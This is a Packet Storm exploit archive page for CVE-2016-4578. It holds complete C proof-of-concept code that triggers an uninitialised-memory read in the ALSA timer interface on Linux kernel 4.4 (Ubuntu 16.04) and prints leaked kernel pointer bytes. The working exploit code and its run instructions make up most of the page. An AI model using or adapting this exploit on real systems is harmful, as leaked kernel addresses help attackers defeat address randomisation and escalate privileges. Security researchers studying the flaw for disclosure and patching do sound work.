exploit the possibilities

Linux Kernel 4.4 (Ubuntu 16.04) snd_timer_user_ccallback() Kernel Pointer Leak

Linux Kernel 4.4 (Ubuntu 16.04) snd_timer_user_ccallback() Kernel Pointer Leak
Posted Mar 11, 2019
Authored by Wally0813

Linux Kernel version 4.4 (Ubuntu 16.04) suffers from a snd_timer_user_ccallback() kernel pointer leak vulnerability.

tags | exploit, kernel
systems | linux, ubuntu
advisories | CVE-2016-4578
MD5 | cf9d401a9cb8b4f7cdf8742a64581c60

Linux Kernel 4.4 (Ubuntu 16.04) snd_timer_user_ccallback() Kernel Pointer Leak

Change Mirror Download
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sound/asound.h>

# Exploit Title: Linux Kernel 4.4 (Ubuntu 16.04) - Leak kernel pointer in snd_timer_user_ccallback()

# Google Dork: -

# Date: 2019-03-11

# Exploit Author: wally0813

# Vendor Homepage: -

# Software Link: -

# Version: Linux Kernel 4.4 (Ubuntu 16.04)

# Tested on: ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

# CVE: CVE-2016-4578

# Category: Local



/*
* [ Briefs ]
* - If snd_timer_user_ccallback() doesn't initialize snd_timer_tread.event and snd_timer_tread.val, they are leaked by snd_timer_user_read()
* - This is local exploit against the CVE-2016-4578.
*
* [ Tested version ]
* - 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
*
* [ Prerequisites ]
* -
*
* [ Goal ]
* - Leak 4 bytes kernel pointer address using snd_timer_user_ccallback()
*
* [ Run exploit ]
* - $ gcc -o poc poc.c
* - $ sudo ./poc
* leak_value(event) : ffff8800
* leak_value(val) : ffffffff
*
* [ Contact ]
* - soyeoni0813@gmail.com
*/



int fd;

void leak(){

struct snd_timer_tread td;
struct snd_timer_select st;
struct snd_timer_params ps;
int r;
unsigned int leak_value_e, leak_value_v;
int tread;

memset(&td,0,sizeof(td));
memset(&st,0,sizeof(st));
memset(&ps,0,sizeof(ps));


// set tread
tread = 1;
ps.filter |= 1<<SNDRV_TIMER_EVENT_START;
ps.ticks = 1000 * 1000;

r = ioctl(fd, SNDRV_TIMER_IOCTL_TREAD, &tread);
if (r) {
printf("SNDRV_TIMER_IOCTL_TREAD error : %d, %s\n", errno, strerror(errno));
return;
}


// vuln trigger
st.id.dev_class = SNDRV_TIMER_CLASS_GLOBAL;
st.id.dev_sclass = SNDRV_TIMER_SCLASS_APPLICATION;
r = ioctl(fd, SNDRV_TIMER_IOCTL_SELECT, &st);
if (r) {
printf("SNDRV_TIMER_IOCTL_SELECT error : %d, %s\n", errno, strerror(errno));
return;
}

r = ioctl(fd, SNDRV_TIMER_IOCTL_PARAMS, &ps);
if (r) {
printf("SNDRV_TIMER_IOCTL_PARAMS error : %d, %s\n", errno, strerror(errno));
return;
}

r = ioctl(fd, SNDRV_TIMER_IOCTL_START);
if (r) {
printf("SNDRV_TIMER_IOCTL_START error : %d, %s\n", errno, strerror(errno));
return;
}


// get leak
r = read(fd, &td, sizeof(td));

leak_value_e = *((unsigned long *)(&td.event+1));
printf("leak_value(event) : %lx\n", leak_value_e);

leak_value_v = *((unsigned long *)(&td.val+1));
printf("leak_value(val) : %lx\n", leak_value_v);

}

int main(int argc, char **argv)
{
fd = open("/dev/snd/timer", O_RDWR);

if (fd < 0) {
printf("open error : %d, %s\n", errno, strerror(errno));
return -1;
}

leak();
close(fd);
return 0;
}

Comments (1)

RSS Feed Subscribe to this comment feed
sonia21

You can visit ienjoyshayari.in/holi-wishes for more help about that matter.

Comment by sonia21
2019-03-12 05:03:56 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    4 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close